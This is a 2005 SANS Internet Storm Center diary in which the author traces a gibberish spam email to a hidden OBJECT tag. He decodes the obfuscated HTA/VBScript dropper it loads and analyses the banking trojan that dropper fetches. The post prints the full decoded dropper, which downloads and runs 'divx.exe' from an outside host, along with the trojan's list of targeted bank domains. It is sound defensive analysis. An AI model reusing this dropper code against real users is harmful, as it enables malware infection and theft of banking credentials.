SANS/ISC Webcast; MS05-017 Exploit; They're Baaaaaack...; Follow the Bouncing Malware : A Fresh Bounce (Updated: 22:30 GMT)

Published: 2005-05-11
Last Updated: 2005-09-07 13:48:02 UTC
by Tom Liston (Version: 1)

Note: Viewing this diary may very well set off your antivirus software. If it does: tough. Nothing in here is Evil (at least in the incarnation that it appears here.) If you write me to tell me that it set off your AV, I?ll quite possibly write back and make fun of you. You?ve been warned.

SANS/ISC Webcast Today

Be there... Aloha.

MS05-017 Exploit

An exploit for MS05-017 (that place-holder "0" in front of the 17 inspires confidence, doesn't it?) is now available as part of the Metasploit Framework, so if you aren't patched... well, why aren't you?

MS05-017 (Vulnerability in Message Queuing Could Allow Code Execution / CAN-2005-0059 / KB892944) was part of Microsoft's April 2005 release and more information can be found here;.
I've not had a chance to test this yet, but H.D. is pretty amazing, so I don't have much question that it works.

They're Baaaaaaaaaaaaaack....

Rumor has it that Microsoft will re-release the MS05-019 security update in June, 2005 correcting their removal of raw sockets...

Follow the Bouncing Malware: A Fresh Bounce

Well, some people have pointed out that it?s been quite some time since I last posted a ?Follow the Bouncing Malware? installment and... well... due to the overwhelming demand (thanks Mom...) here we are.

I thought I would take a look at something more recent - something that might have landed in your inbox sometime over the past couple of weeks, and so I?ve subtitled this journey: A Fresh Bounce.

Disclaimer: None of the links in the following account are ?clickable?. There is a very good reason for that. If I make the links clickable, some yahoo out there will click them. If you insist on playing with these sites you?ll need to at the very least, cut and paste to do it. If you infect your machine, don?t even think of blaming me. If you write me to tell me that you infected yourself, I?ll quite possibly write back and make fun of you. You?ve been warned.

Just the other day, I received the following urgent message via a mailing list address at incidents.org. Poor li?l Sasha was obviously in need of some help:

Delivered-To: xxxxxxxxxxx@gmail.com

From: Sasha NOBLE <xxxxxxxxxxx@roxette.org>

To: xxxxxxx@incidents.org

Subject: Help me

Date: Wed, 04 May 2005 11:15:39 +0000

  Hello, Lucas!  some help sunburned normal. how ray backbit me violently?

repeatedly position wrought my east except blood. i overrode a boiling

dad beyond science. kindly. their tight spring under office, which sneaked

future, elastic current. Norman felt that stiff list. i drew Marlen who

ridded me Jabari! she dug elastic arm, that interbred foolishly... beyond

interest dowed tin, authority withdrew above the expert toward sad boat:

 you misread her ready decision aboard our special expansion, who laid

wearily. a bright balance swam considering our idea; elastic, angry wall.

black drink sock cost, he hoised yearly, deliberately, tenderly. this good

brass came from his offer; rough, possible paper. he wound your future

dress for the private chief, which miscast exactly. she gave him separate.

i outputted clear surprise, which misunderstood obnoxiously...  bent the

general play,

Jude MARINO.

Ok... Maybe it was Jude who was in need of help... Or Lucas.... or Norman... or Marlin... or... Jabari...

But I digress...

Suffice to say that someone, somewhere, was in urgent need of my help. And a grammar checker.

How could I possibly ignore their plea?

Well, if I were like most of the rest of you heartless swine, I would simply click the ?delete? button on Outlook. But, to quote the Kink^Hg of Pop in a distant yet eerily prescient incarnation of himself, ?I?m not like the other guys...? and so I started to click the delete button in Thunderbird.

But I couldn?t bring myself to do it.

The dang batteries on my cordless mouse chose that moment to go dead.

Having had far too little sleep, and far too much caffeine, I seized on this as some sort of sign, (I have a tendency to do that... sometime I?ll tell you the story of the Twinkie that, for several months, I believed was the reincarnation of my recently deceased cat...) and decided to swap in some fresh double-A?s and investigate what might be troubling Sasha/Jude/Lucas/Norman/Marlin/Jabari (hereinafter referred to as SJLNMJ).

Disjointed thoughts and poor punctuation were the least of SJLNMJ?s issues. There was Evil lurking in this message: HTML.

Email messages are supposed to be text, thank you. Text. Only text. If God had intended for email to be written in HTML, then the traditional signoff of prayers would be </amen>.

But, I digress...

While the text portion of SJLNMJ?s message reads like James Joyce on crack, perhaps a review of the HTML portion of SJLNMJ?s message would make things clearer:



Content-Type: text/html; charset="iso-8859-1"

Content-Transfer-Encoding: 7bit



<HTML> <BODY> <FONT face="Verdana, Arial"> Hello, Lucas!

<P>

some help sunburned normal. how ray backbit me violently? repeatedly

position wrought my east except blood. i overrode a boiling dad beyond

science. kindly. their tight spring under office, which sneaked future,

elastic current. Norman felt that stiff list. i drew Marlen who ridded

me Jabari! she dug elastic arm, that interbred foolishly... beyond

interest dowed tin, authority withdrew above the expert toward sad boat:

<P>

you misread her ready decision aboard our special expansion, who laid

wearily. a bright balance swam considering our idea; elastic, angry

wall. black drink sock cost, he hoised yearly, deliberately, tenderly.

this good brass came from his offer; rough, possible paper. he wound

your future dress for the private chief, which miscast exactly. she gave

him separate. i outputted clear surprise, which misunderstood

obnoxiously...

<P>

bent the general play,


Jude MARINO. </FONT><P>

<img width=50 height=100 style="display:none"><div

id="abc"></div><ObJecT

data="http://www.oil-bank.ru/cgi-bin/gen/pscounter.cgi?action=click">

Ah! That?s so much clearer. (Okay... I lied. It?s still gibberish.)

Hey! What?s that at the end? An OBJECT tag! Oooo! How fun!

Let?s see where it leads!

(Note: I said ?let?s,? but face it, I really didn?t mean it. Remember: Don?t even think about trying this yourself, boys and girls. You stay here... I?ll go in first...)

(Note #2: I?m talking to you, Mr. ?I Know What I?m Doing.? Don?t try it.)

Grabbing the results of that PHP script with the parameter ?action=click,? gives us the following:



<HTML><HEAD><TITLE>Universal Plugin pre-Installer</TITLE>

<HTA:APPLICATION id=PlugInst

APPLICATIONNAME="Plugin pre-Installer"

SHOWINTASKBAR=NO

CAPTION=YES

SINGLEINSTANCE=YES

MAXIMIZEBUTTON=NO

MINIMIZEBUTTON=NO

WINDOWSTATE=MINIMIZE

/></HEAD>

<OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B">

</OBJECT>

<BODY>

<SCRIPT language="VBScript">

EP=document.location.href 

j=InStrRev(EP,"/",-1,1)

EP=Left(EP,j)

If InStr(EP,"cgi-bin")<>0 Then

CGIP=EP & "pscounter.cgi"    

Else

CGIP=EP & "cgi-bin/gen/pscounter.cgi"    

End If   

IP= CGIP & "?action=install"  

Set oSA = CreateObject("Shell.Application")

On Error Resume Next

oSA.ShellExecute "mshta",IP

If Err.number <> 0 Then

Cmd="mshta " & IP

MSplay.Run (Cmd),1,FALSE         

End If

self.Close

</SCRIPT>

</BODY></HTML>

Now I?ve never claimed to be a JavaScript guru (why would anyone claim such a thing publicly?) but it seems pretty obvious that this little gem is intended to take us right back where we came from but using the parameter ?action=install? this time.

And so, with reckless abandon, complete disregard for personal safety, and a 20 oz Mountain Dew, I returned to the Russian oil bank, lookin? for a little action... uh... equals install:

(Remember... I?m 10? tall and bulletproof. You?re not. Don?t try this at home.)

<HTML><HEAD><TITLE>Universal Plugin pre-Installer</TITLE>

<HTA:APPLICATION id=PlugInst

APPLICATIONNAME="Plugin Installer"

SHOWINTASKBAR=NO

CAPTION=YES

SINGLEINSTANCE=YES

MAXIMIZEBUTTON=NO

MINIMIZEBUTTON=NO

WINDOWSTATE=MINIMIZE/>

</HEAD>

<OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B">

</OBJECT>

<OBJECT id="MSmedia" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228">

</OBJECT>

<BODY>

<SCRIPT LANGUAGE="JavaScript">

d="=UFYUBSFB je>Nbjo`IUB?=IUNM?=IFBE?=IUB;BQQMJDBUJPOR#QYQ

8#OBNF>QYQ TIPXJOUBTLCBS>OP

DBQJ#>ZFTD#JOHMFJOTUBODF8#NBYJNJ[FCVUUPOZ#NJO7#XJOEPXTUBUF>C#

0t$0#%CPEZ+#TDSJQU? gvodujpo

Em(Sq-Mo-St-emm*|usz+#tBY>voftdbqf(%52EPEC%3fTusfbn*<wbs pT>ofx

BdujwfYPckfdu(tBY*<



<quite literally, TONS of gibberish deleted>";



l='\0\t\n\r-� !"#$%&\'()*+,-./0123456789:;<=>?@

ABCDEFGHIJKLMNOPQRSTUVWXYZ[\134]^_`abcdefghijklmnopqrstuvwxyz{|}~';

s='';

for (i=0;i<d.length;i++){b=d.charAt(i);a=l.indexOf(b);if (a==1) a=9;if

(a==2) a=10;if (a==3) a=13;if (a==4) a=34;if (a<=31 &

a>=14){off=s.length-(l.indexOf(d.charAt(++i))-36+90*(l.indexOf(d.charAt(++i))-35))-1;

lp=off+a-14+4;s=s+s.substring(off,lp);}else

if (a>0){ if (a>=41) a=a-1; s=s+l.charAt(a);} else

s=s+b;}document.writeln(s);

</SCRIPT></body></html>

Dang... It looks like a dictionary threw up. (Note: The above is an inexact replica of the actual file that I downloaded. Some of the characters in the original can?t be displayed properly in the diary. Sorry ?bout that.)

And now, dear reader, I?m going to let you in on a little secret. Please understand though that what I?m about to tell you must remain absolutely confidential... it?s super top secret: All of that stuff up there...

...it?s encoded.

Somebody has written some stuff that THEY DON?T WANT US TO SEE.

Shhhh... don?t tell anyone.

Ok. So perhaps that was... well... blatantly obvious.

But what isn?t obvious is how we?re going to deal with this stuff. Get ready boys and girls, ?cause kindly ol? Dr. Tom is gonna take you on a trip down Reverse Engineering Lane and hopefully teach you a thing or three about how to deal with this kind of code obfuscation all on your own.

Now, many years ago, back when I was younger, dumber, and more energetic, I would have banged together some perl code to try to make some sense out of that wad of characters. Time has mellowed me, however, and I?ve come to understand that youthful energy and enthusiasm can nearly always get the daylights kicked out of it by the lazy deviousness that comes with age. ?Why work harder when you can work smarter?? and several other clich�s of that ilk come to mind. I?ve come to a place in my life now, where I can cause my adversary to use his own skills against himself, much like Road Runner always does to Wiley Coyote. (I bet you thought I was going to go for some Zen/Kung Fu reference, didn?t you...)

Disregarding the ?data? in the above JavaScript, a quick look at the actual functional portion reveals some interesting things. The code will decode the data and write it into a live HTML document using that ?document.writeln()? call. That ?document? will then execute and, presumably, do something... probably something Bad. But... what if we could co-opt that process and use it to show us the decoded document?

It turns out that it?s not too difficult to accomplish that.

Because JavaScript has far more capabilities when run from your local machine than it ever does when run from a website, we?ll use that difference to our advantage. By inserting a call to an ActiveX component, we can actually open a file on our test machine. We?ll then make a slight alteration to the original script function, and we?ll be able to use the script itself to write out the decoded content.

Whoa... it almost sounds like I know what I?m talking about, doesn?t it?

Before I continue, please note: Never, EVER do this on a production machine. Never do this on a machine that will be used for anything else. Never do this on any machine connected to the network. Never do this on a machine you?re not prepared to format and reinstall. Never, EVER, spit into the wind.

Really.

So... we?re going to stick the following snippet into the JavaScript up near the beginning, right after the <SCRIPT LANGUAGE="JavaScript"> line:

var fso, output; 

fso = new ActiveXObject("Scripting.FileSystemObject"); 

output = fso.OpenTextFile("C:\\test.txt" , 8, 1, -2);

Then, we?re going to change the ?document.writeln()? function call at the end of the code to be a call to ?output.write()?

Why? Well, that first snippet will create a FileSystemObject which it then uses to open a file called ?test.txt? on the root of our C: drive. The ?handle? to the output file is called, conveniently enough, ?output.? We then change the call from document.writeln() to a call to output.write() and anything that was going to be written into the live HTML document will now go into our output file.

We then fire the newly edited script off in InternetExplorer on a convenient sacrificial box and lo! We find the decoded output in C:\test.txt.

Now someone, somewhere, spent a great deal of time thinking up that whole ?encoding? scheme. Several hours were spent, huddled over a keyboard creating the functions to both encode and decode that gibberish, and we just blew it all away with about two minutes work. As you can see, it didn?t really ?hide? much of anything from us... Perhaps that anonymous programmer?s time would have been better spent taking... say... an ethics class...

Looking for a real job...

Learning to program in a real language...

But I digress...

The output in my ?test.txt? file looked like this:

<TEXTAREA id="Main_HTA">

<HTML><HEAD>

<HTA:APPLICATION id=PXP

 APPLICATIONNAME="PXP"

 SHOWINTASKBAR=NO

 CAPTION=YES

 SINGLEINSTANCE=YES

 MAXIMIZEBUTTON=NO

 MINIMIZEBUTTON=NO

 WINDOWSTATE=MINIMIZE

 />

</HEAD>

<BODY>

<SCRIPT> 

function Dl(Rp,Ln,Rs,dll)

{

try

{

sAX=unescape("%41DODB%2eStream");

var oS=new ActiveXObject(sAX); 

var oX=new ActiveXObject("Microsoft.XMLHTTP"); 

oX.Open("GET",Rp,0); 

oX.Send();   

var XB=oX.responseBody;

oS.Type=1;

oS.Mode=3; 

oS.Open;

oS.Write(XB); 

oS.SaveToFile(Ln,2);

var oA=new ActiveXObject("Shell.Application");

if (dll==0) 

{

Cmd=Ln+" "+Rs;

oA.ShellExecute(Cmd);

}

else

{

Cmd=Ln+Rs;

oA.ShellExecute("rundll32",Cmd); 

}

}

catch(e){}

}

self.moveTo(5000,5000);

</TEXTAREA>

<IFRAME name="icounter" src="about:blank" width=10 height=10></IFRAME>

<SCRIPT language="VBScript">

     ssfDESKTOP = 0

     ssfPROGRAMS = 2

     ssfSTARTMENU = 11

     ssfDESKTOPDIRECTORY = 16

     ssfFONTS=20

     ssfCOMMONSTARTMENU = 22

     ssfCOMMONPROGRAMS = 23

     ssfCOMMONSTARTUP = 24

     ssfCOMMONDESKTOPDIR = 25

     ssfCOMMONALTSTARTUP = 30

     ssfCOMMONFAVORITES = 31

     ssfCOMMONAPPDATA = 35

     ssfWINDOWS = 36

     ssfSYSTEM = 37

     Dim oXMLHTTP

     Dim oShellApp

     Dim oFolder

     Dim oFolderItem

     Dim PluginFile

     Dim WinDir

     Dim EnvStrings

     Dim Font_Path_Components

     Dim XMLBody

     Dim cByte

     Dim ByteCode   

     Dim Main_HTA_Body

     Dim Cmd_Params

     Dim Module_Path

     Dim Trojan_Path

     Dim IntervalID

     Dim nCmdCalled

     nCmdCalled=0

     WinEnv_Mask="windir=" 

     Exploit_Path=document.location.href 

     j=InStrRev(Exploit_Path,"/",-1,1)

     Exploit_Path=Left(Exploit_Path,j)

     If InStr(Exploit_Path,"cgi-bin")<>0 Then

        CGI_Script_Path=Exploit_Path & "pscounter.cgi"    

     Else

        CGI_Script_Path=Exploit_Path & "cgi-bin/gen/pscounter.cgi"    

     End If   

     document.frames(0).location.href = CGI_Script_Path & "?action=finish"  

     InitPaths()

     Randomize

     self.MoveTo 6000,6000

     ExeName=GenerateName()

     ExeName=ExeName & ".exe"

     DllName=GenerateName()

     DllName=DllName & ".dll"     

     HTAName=GenerateName()

     HTAName=HTAName & ".hta" 

     Set oShellApp = CreateObject("Shell.Application")

     Set oFolder = oShellApp.NameSpace(ssfFONTS)

     Set oFolderItem=oFolder.ParseName("Symbol.ttf")

     TestName=oFolderItem.Path

     xTestName=Replace(TestName,"Symbol","Symbolw",1,-1,vbTextCompare)

     Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)

     WinDir= Font_Path_Components(0) & "\" &  Font_Path_Components(1) & "\"

     ExeName=WinDir & ExeName

     DllName=WinDir & DllName

     HTAName=WinDir & HTAName

     On Error Resume Next

     Set oFolderItem = oFolder.ParseName("Symbolw.ttf")

     If Err.number <> 0 Then

        Call Run_Installer 

     Else

        LinkPath=oFolderItem.Path

        If LinkPath="" Then

           Call Run_Installer 

        Else

           self.Close

        End If

     End If

     setTimeout "HangUp()",9000

 Sub  Run_Installer

     Main_HTA_Body=document.all.Main_HTA.innerText

     Download_Call="Dl('" & Trojan_Path & "'"  & "," & "'" & ExeName & "'" & 

     "," & "'',0);"

     Download_Call=Replace(Download_Call,"\","\\")

     Main_HTA_Body= Main_HTA_Body &  Download_Call

     Main_HTA_Body= Main_HTA_Body & "self.close();</SCR" & "IPT></BODY>"

     Main_HTA_Body=Replace(Main_HTA_Body,vbCrLf,"")

' Prepare the string that will be passed to cmd.exe

     Main_HTA_Body=Replace(Main_HTA_Body,">","^>")

     Main_HTA_Body=Replace(Main_HTA_Body,"<","^<")

     WinOS=Get_Win_Version

     Select Case WinOS

            Case "NT"

            Call Download_and_Execute(Trojan_Path,ExeName,"",0)

            Cmd_Params="cmd /c copy " & TestName & " " & xTestName  

            MSplay.Run (Cmd_Params),1,FALSE 

            Case "2K"

     ' Create an additional HTA file (can't be greater than 1000 bytes) 

            Cmd_Params="/c echo " & Main_HTA_Body & " > " & HTAName

            oShellApp.ShellExecute "cmd",Cmd_Params,"open"

            oShellApp.ShellExecute "mshta",HTAName

            Cmd_Params="/c copy " & TestName & " " & xTestName 

            oShellApp.ShellExecute "cmd", Cmd_Params

            Cmd_Params="/c del " &  HTAName

            IntervalID=setInterval("Delete_HTA(Cmd_Params)",3000)  

            Case "XP"

     ' Create an additional HTA file (can't be greater than 1000 bytes) 

            Cmd_Params="/c echo " & Main_HTA_Body & " > " & HTAName

            oShellApp.ShellExecute "cmd",Cmd_Params,"open"

            oShellApp.ShellExecute "mshta",HTAName

            Cmd_Params="/c copy " & TestName & " " & xTestName 

            oShellApp.ShellExecute "cmd", Cmd_Params

            Cmd_Params="/c del " &  HTAName

            IntervalID=setInterval("Delete_HTA(Cmd_Params)",3000)  

            Case Else

            Call Download_and_Execute(Trojan_Path,ExeName,"",0)

            Cmd_Params="command /c copy " & TestName & " " & xTestName  

            MSplay.Run (Cmd_Params),1,FALSE         

      End Select      

End  Sub  



Sub Download_and_Execute(Remote_path,Local_name,Run_params,Run_by_Rundll32)



set oXMLHTTP = CreateObject("Microsoft.XMLHTTP")

Module_Path=Remote_path

OpenSession()

GetStatus=GetFile() 

   If GetStatus=0 Then 

   Plugin_size=LenB(XMLBody)   

   Set PluginFile=MSmedia.CreateTextFile(Local_name, TRUE)

   For j=1 To Plugin_size 

       cByte=MidB(XMLBody,j,1)

       ByteCode=AscB(cByte)

       WriteFile()

   Next

   PluginFile.Close

   If Run_by_Rundll32 = 0 Then

      Cmd=Local_name & " " & Run_params

   Else

      Cmd="rundll32" & " " & Local_name & Run_params  

   End If

   On Error Resume Next

   MSplay.Run (Cmd),1,FALSE

   End If

set  oXMLHTTP=Nothing

End Sub



Function HangUp()

        clearInterval(IntervalID)

        self.Close

End Function



Function Delete_HTA(params)

        If  nCmdCalled<4 Then 

        oShellApp.ShellExecute "cmd",params

        nCmdCalled=nCmdCalled+1

        End If

End Function   



Function Get_Win_Version()

     IEversion=navigator.appVersion

     If InStr(IEversion,"Windows 95") <> 0  Then

        Get_Win_Version="95"

     ElseIf InStr(IEversion,"Windows NT 4") <> 0  Then

        Get_Win_Version="NT"

     ElseIf InStr(IEversion,"Win 9x 4.9") <> 0  Then

        Get_Win_Version="ME"

     ElseIf InStr(IEversion,"Windows 98") <> 0  Then

        Get_Win_Version="98"

     ElseIf InStr(IEversion,"Windows NT 5.0") <> 0  Then

        Get_Win_Version="2K"

     ElseIf InStr(IEversion,"Windows NT 5.1") <> 0  Then

        Get_Win_Version="XP"

     Else 

        Get_Win_Version="Unknown"

     End If

End Function



Function WriteFile

PluginFile.Write(Chr(ByteCode))

End Function



Function GetFile

     oXMLHTTP.Send() 

     On Error Resume Next

     XMLBody=oXMLHTTP.responseBody

     If Err.number <> 0 Then

        GetFile=-1 

     Else

        GetFile=0 

     End  If     

End Function



Function OpenSession

Req_type="G" & "E" & "T"

HTTPSession=oXMLHTTP.Open(Req_Type,Module_Path,0) 

End Function



Function GenerateName()

RandomName=""

rr=Int(8*Rnd)

ik=0

Do

ii=Int(25*Rnd)+97

RandomName=RandomName+Chr(ii)

ik=ik+1

Loop While ik<rr

GenerateName=RandomName

End Function



Function InitPaths

Trojan_Path="http://www.subtilius.com/divx.exe" 

End Function



</SCRIPT>

</BODY></HTML>

Well now. Ain?t that purty? I really do appreciate the way that they?re not even attempting to rationalize what they?re doing... with variable names like ?Trojan_Path,? staring you in the face, it?s sorta? hard to keep up the charade that you?re writing an app for ?market research.?

Speaking of ?Trojan_Path? let?s see what we find at the other end...

The file divx.exe is a Win32 executable, 21,536 bytes long. Taking a quick look at the file reveals that it has been packed with FSG and has a really mangled PE header and a tiny, really whacked MZ header. Once again, someone is trying to hide something...

Packed / obfuscated executables are nothing more than an annoyance. They don?t stand up to a determined effort to unpack them because, like the ?encoding? we just blew away, packed executables always carry the keys to the kingdom along with them. Generally with a little coaxing, they give up their secrets. FSG is no exception, and with a bit of effort, I was able to unpack the divx.exe executable. When I did, I found all sorts of interesting stuff...

When executed, divx.exe copies itself to the windows\system32 folder under the name winldra.exe installs a key to launch itself in HKLM\Software\Microsoft\Windows\CurrentVersion\Run and dumps several DLL files in the system32 folder. These DLL files are used by the executable to latch itself into the Windows CBTProc hook, a rather dubious ?feature? of the operating system that was intended to be used by Computer Based Training programs to monitor what?s going on in the active window. According to Microsoft, ?The system calls this function before activating, creating, destroying, minimizing, maximizing, moving, or sizing a window; before completing a system command; before removing a mouse or keyboard event from the system message queue; before setting the keyboard focus; or before synchronizing with the system message queue. A computer-based training (CBT) application uses this hook procedure to receive useful notifications from the system.?

?Useful notifications?...

Yep.

Pretty darned useful, if you?re a virus.

With that viewpoint, the program watches for access to several banking sites:

cbonline.co.uk

new.egg.com

anbusiness.com

my.if.com

co-operativebank.co.uk

abbeynational.co.uk

smile.co.uk

commerzbank.com

cbksec.com

westlb.de

westlbmarkets.net

adig.de

ebase.com

dresdner-privat.de

teledata.de

diba.de

schwaebisch-hall.de

bayernlb.de

bfg.de

seb.de

cashbox.de

1822direkt.com

internet-filiale.net

comdirect.de

diraba.de

dab-bank.com

dit.de

fraspa1822.de

haspa.de

gad.de

gallinat.de

helaba-trust.de

heller-bank.de

ikb.de

lbb.de

lrp.de

lbbw-direkt.de

lbbw.de

leonberger.de

wuestenrot.de

nordlb.de

olb.de

rwg.de

rbgarrel.de

rb-graefo.de

paffrather.de

rb-pfaffenhofen-roth.de

raiba-nu-wh.de

santander.de

sparda-hh.de

sparda.de

spk-marne.de

izb.de

lzo.com

naspa.de

osgv.de

neumarkt-direkt.de

sskduesseldorf.de

sskm.de

suedwestlb.de

ammerland.de

borkenervb.de

vilstal.net

hsbc.co.uk

sparkasse

skodabank.de

volkswagenbank.de

bmwbank.de

There are also some shenanigans done with several citibank.de hosts, but I?m not entirely sure how that works...

Ever helpful, the program then corrects any math errors the user may make while using the site.

(Just checking to see if you were still paying attention...)

It actually captures text within any browser session associated with one of those sites saving it in a file and sending it off via email. Then, in a fit of pique and poor grammar, it commemorates the occasion with a registry entry:

HKCU\Software\SARS\mailsended = 1

Really nice, eh?

It also takes the, now pass�, step of diddling with the user?s hosts file and routing a large list of antivirus vendor sites to the loopback address.

FYI: When I first started playing with this chunk o' malware I sent it off to all of the major AV vendors and it should currently be identified by their signature files. Attempts were made to get the offending sites shut down as well.

So after all of that, I suddenly find myself re-thinking the whole ?good Samaritan? thing where ol? SJLNMJ is concerned. Yes, SJLNMJ needed help alright... he/she/they/it needed help to the funds in my online bank account (of which I have none...)

I?ve learned my lesson - helping others is bad. The crooks and thieves of this world rely on and use our better natures against us. You won?t catch me making THAT mistake again...

Hey! Lookie here! There?s this dude in Nigeria that has to find a way to get $50,000,000 US out of the country... all he needs is a little help.

---------------------------------------------------------------------

Handler on Duty

Tom Liston - Intelguardians Network Intelligence, LLC - tom at intelguardians dot com

Keywords:

0 comment(s)